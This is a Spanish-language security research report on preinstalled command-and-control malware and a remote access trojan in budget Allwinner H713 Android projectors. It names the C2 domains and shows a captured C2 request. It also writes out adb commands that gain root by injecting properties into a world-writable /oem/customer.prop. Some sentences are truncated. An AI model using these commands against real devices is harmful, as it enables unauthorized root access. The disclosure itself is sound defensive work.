
Desglose de un c2-network de beamers chinos - SilentSDK-Analysis
Informe de Análisis Técnico — Investigación de Seguridad
Dispositivos Afectados: Múltiples proyectores Android de marcas como Nonete (p. ej., modelo HY260Pro) (probablemente también varios proyectores de Magcubic, Hotack, Huyukang y muchos más, ya que estas empresas distribuyen modelos similares y hay indicios que lo respaldan)
Plataforma de Chipset: Allwinner H713 / sun50iw12p1 — potencialmente afecta a todos los dispositivos en esta plataforma
Período de Análisis: 11–17 de abril de 2026
Clasificación: Infraestructura de Comando y Control preinstalada con payload de Troyano de Acceso Remoto
api.pixelpioneerss.com), extrae IDs de dispositivo sensibles y puede descargar y ejecutar código malicioso adicional arbitrario con privilegios de root en cualquier momento (chmod 777). Además, los dispositivos presentan puertas traseras de root abiertas.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) deben bloquearse a nivel de red. Los usuarios afectados solo pueden deshabilitar las aplicaciones maliciosas manualmente mediante ADB, ya que están profundamente incrustadas en el sistema.La infraestructura de malware documentada en este informe está preinstalada en proyectores Android que se venden actualmente en grandes cantidades a consumidores finales en Amazon, eBay y AliExpress. Los dispositivos afectados abarcan posiblemente múltiples nombres de marca (Hotack, Huyukang, Magcubic, Nonete, entre otros). Se ha confirmado de forma independiente una infraestructura C2 idéntica en otros dispositivos del mismo fabricante (ver Sección 13). El patrón coincide con los casos BADBOX.
Dispositivo Comprado: Enlace de Amazon - Nonete Mini Beamer 4K 1080P
| Propiedad | Valor |
|---|---|
| Nombre de Marca | Nonete HY260Pro (modelo vendido por múltiples empresas) |
| Nombre del Modelo Interno | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32 bits) |
| Sistema Operativo | SpectraOS (Android 11, Kernel 5.4.99) |
| Build Fingerprint Real | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Build Fingerprint Suplantado | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permisivo (sin aplicación de políticas) |
| Clave de Firma de Plataforma | Clave de Prueba Pública de AOSP |
| Certificado OEM | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Canal de Firmware | HY260Pro_SpectraOS_TPYB |
Nota sobre el alcance: El chipset Allwinner H713 está incorporado en numerosos proyectores Android baratos vendidos bajo nombres de marca cambiantes en el mercado europeo. La misma base de firmware (h713_tuna_p3) y el mismo operador C2 (Shenzhen Aodin Technology) sugieren fuertemente que todos los dispositivos de este OEM contienen la misma infraestructura.
| Paso | Acción | Resultado |
|---|---|---|
| 1 | Captura de tráfico de red con Wireshark | Tráfico HTTP a store-api.aodintech.com |
| 2 | Decodificación de la respuesta C2 comprimida con gzip | 7 aplicaciones, incluyendo "SilentTools" oculta |
| 3 | Descifrado AES-CBC de la ruta de descarga | Clave [REDACTED], URL al archivo .bpp |
| 4 | Explotación de root mediante /oem/customer.prop | uid=0(root) tras inyección de propiedades |
| 5 | Volcado forense de /data, /oem, /system | APKs, bases de datos, configuraciones |
| 6 | Análisis estático de StoreOS DEX | pm install -r -d, protección por inversión de bytes |
| 7 | Ingeniería inversa del mecanismo reverseLen | Comprensión de la protección anti-análisis |
| 8 | Rotura de la protección por inversión de bytes | DEX de SilentSDK descifrado y analizable |
| 9 | Descifrado XOR de cadenas de SilentSDK | Dominio C2 api.pixelpioneerss.com confirmado |
| 10 | Verificación de hash en tres fuentes | MD5/SHA-256 coinciden perfectamente |
| 11 | Ingeniería inversa del proceso de descarga del malware | Servidores aún en línea |
| 12 | Ingeniería inversa del malware | Framework RAT basado en plugins |
El acceso root se logró mediante una combinación de tres vulnerabilidades:
/oem escribible por cualquier usuario — La partición está montada como FAT con fmask=0000.customer.prop cargado al arrancar — Sobrescribe propiedades del sistema.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**Impacto:** Cualquier usuario con acceso físico o un atacante en la misma red (a través de ADB, puerto 5555 abierto, sin autenticación) obtiene acceso completo como root.
---
## 4. Respuesta del Servidor C2 — Evidencia Principal
### Solicitud HTTP Capturada```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
La respuesta comprimida con gzip contiene una lista JSON con siete aplicaciones. Seis de ellas son aplicaciones de streaming normales (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). La séptima es SilentTools: